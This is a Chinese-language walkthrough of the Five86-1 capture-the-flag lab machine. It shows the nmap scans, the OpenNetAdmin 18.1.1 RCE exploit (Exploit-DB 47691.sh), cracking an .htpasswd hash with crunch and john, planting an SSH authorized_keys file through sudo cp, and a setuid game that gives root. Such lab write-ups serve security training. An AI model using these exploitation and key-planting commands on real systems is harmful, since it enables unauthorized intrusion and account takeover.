靶机信息
下载地址:https://www.five86.com/five86-1.html 网络连接:NAT,kali和靶机为同一网段 下载好靶机解压后,直接运行文件夹里的.ova文件即可
信息搜集
使用nmap扫描同网段的信息,筛选出目标ip地址
nmap -sn 192.168.74.0/24
对此ip做进一步的扫描
nmap -A 192.168.74.136
浏览器访问该ip发现网页为空白界面
从扫描信息中的可以获得两个路径/robots.txt /ona
漏洞利用
OpenNetAdmin简称ona,是一款网络管理工具
在kali上搜索到两个该版本的漏洞,目标主机的ona版本为v18.1.1,可以进行利用
这里使用的是RCE的漏洞
脚本文件路径:./usr/share/exploitdb/exploits/php/webapps/47691.sh
运行脚本文件,在后面跟上目标主机的ona路径即可利用漏洞
./47691.sh http://192.168.74.136/ona/
进入目标主机后,发现无法使用cd命令,查找下有权限可以访问的文件
发现有几个var路径下的文件可以查看
find / -user www-data
查看.htaccess文件后提示另外一个路径
再查看.htpasswd文件发现了一段hash,douglas应该为用户名
最后一行提示密码是由aefhrt组成长度为10的密码
使用crunch生成由字母aefhr组成的10位密码组合到该txt文本当做字典
crunch 10 10 aefhrt -o /five86pass.txt
将之前的hash写入到文档中,然后使用john进行暴破
five86pass.txt为生成的字典,hash.txt为获取到的密码hash
等个两三分钟就能跑出结果来,得到密码fatherrrrr,douglas/fatherrrrr
john --wordlist=/five86pass.txt /hash.txt
试了下是ssh的账号密码,登录到ssh
发现cp命令可以用jen的身份免密执行
ssh -l douglas 192.168.74.136
sudo -l
可以通过ssh密钥进行免密登录
ssh免密登录需要创建/authorized_keys目录,这里在tmp目录下创建,且最低需要600权限
使用jen用户来执行cp命令,将ssh公钥复制到jen家目录下,然后使用ssh公钥登录
cd ~
cp .ssh/id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
ssh -i id_rsa [email protected]
登录到jen账户后发现有邮件
查看邮件发现moss账户的密码为Fire!Fire!,登录到moss账户
在moss的home目录中发现了一个隐藏文件夹.games
在.games文件夹里找到了一个可执行程序upyourgame,全输yes即可
完成问答后即可获取到root权限,然后在root目录下找到flag
cd /home/moss
ls -a
cd .games/
./upyourgame
